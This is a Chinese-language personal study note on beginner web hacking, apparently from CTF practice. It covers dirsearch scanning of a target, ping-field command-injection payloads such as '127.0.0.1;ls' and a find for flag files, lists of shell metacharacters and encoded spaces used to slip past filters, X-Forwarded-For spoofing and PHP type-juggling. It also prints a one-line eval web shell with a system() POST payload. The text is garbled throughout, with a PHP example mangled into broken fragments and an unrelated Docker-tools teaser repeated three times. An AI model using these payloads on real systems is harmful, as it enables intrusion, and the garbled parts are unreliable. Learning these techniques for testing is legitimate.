雖然我不是純做安全的,但作為乙個寫**的,總歸好奇那些「黑客」是怎麼做到在網上攻城掠地的,於是我選擇了web安全作為切入點了解了解:
乙個firefox外掛程式
構造各種請求,抓包之類的,這個是必備工具啦
hackbar要收費了,現在就用這個
git clone
cd dirsearch
python3 dirsearch.py -u -e
python3 dirsearch.py -e php,txt,zip -u https://target -w db/dicc.txt --recursive -r 4 --scan-subdirs=/,/wp-content/,/wp-admin/如果對方用了ping命令又沒有裝防火牆(waf, 即過濾危險字元的)
原理是:
ping ip=127.0.0.1;ls
所以輸入
127.0.0.1;ls127.0.0.1 && find / -name "flag.*"'$', ';', '|', '-', '(', ')', '反引號', '||', '&&', '&', '}', '
win shell:
空格可以替換為%20、%09(tab)、%0b、%0c、%2b(+) in url
如:;』
幾個命令: ls ,cat< ,cat
由於此題是前端ip格式顯示,burp抓包後該資料為127.0.0.1|ls可以檢視key檔名稱。
然後127.0.0.1|cat**隱藏了真實的客戶端,反向**會影響真實的服務端
在一些大型**中,來自使用者的http請求會經過反向**伺服器的**,此時,伺服器收到的remote address位址就是反向**伺服器的位址。在這樣的情況下,使用者的真實ip位址將被丟失,因此有了http擴充套件頭部x-forward-for。當反向**伺服器**使用者的http請求時,需要將使用者的真實ip位址寫入到x-forward-for中,以便後端服務能夠使用。由於x-forward-for是可修改的,所以x-forward-for中的位址在某種程度上不可信。所以,在進行與安全有關的操作時,只能通過remote address獲取使用者的ip位址,不能相信任何請求頭。
偽造方式有很多,可以是自己構造http請求頭也可以是各種瀏覽器外掛程式,burpsuit等抓包工具
典型python**:
import requests
headers =
res = requests.get(url, headers=headers)
res.encoding = 'utf-8'
print(res.text)
用』==『或』>』, '<'在進行比較的時候,會先將字串型別轉化成相同的東西再比較。
開始為數字的字串的開始部分決定了它的值,如果該字串以合法的數值開始,則使用該數值,否則其值為0
舉例:
$a=@$_get['a'];為1234ur
l後輸入
′?a=
0a′,
則a為1234 url後輸入'?a=0a', 則
a為1234
url後
輸入′?
a=0a
′,則a為0
url後輸入』?a=aasd』, 則a為0
url後
輸入′?
a=
1234a′
,則
a為0 url後輸入'?a=1234a', 則
a為0url
後輸入′
?a=1
234a
′,則a為1234
比如頁面裡有這麼一句話:
<?php @eval($_post[pp]);?>所以構造這樣的post請求:
pp=system('******x');細數你不得不知的容器安全工具
網路安全問題的重要性大概毋庸置疑,最近無數關於惡意軟體和安全漏洞的訊息已充分證明了這一點。假如你要管理乙個docker環境,並希望幫助自己的公司或使用者在下乙個大漏洞來臨時避免遇到麻煩,那麼你就需要了解一些保障docker應用安全的工具,並真正地去使用它們。本文將介紹可供使用的docker安全工具 ...
細數你不得不知的容器安全工具
網路安全問題的重要性大概毋庸置疑,最近無數關於惡意軟體和安全漏洞的訊息已充分證明了這一點。假如你要管理乙個docker環境,並希望幫助自己的公司或使用者在下乙個大漏洞來臨時避免遇到麻煩,那麼你就需要了解一些保障docker應用安全的工具,並真正地去使用它們。本文將介紹可供使用的docker安全工具 ...
細數你不得不知的容器安全工具
網路安全問題的重要性大概毋庸置疑,最近無數關於惡意軟體和安全漏洞的訊息已充分證明了這一點。假如你要管理乙個docker環境,並希望幫助自己的公司或使用者在下乙個大漏洞來臨時避免遇到麻煩,那麼你就需要了解一些保障docker應用安全的工具,並真正地去使用它們。本文將介紹可供使用的docker安全工具 ...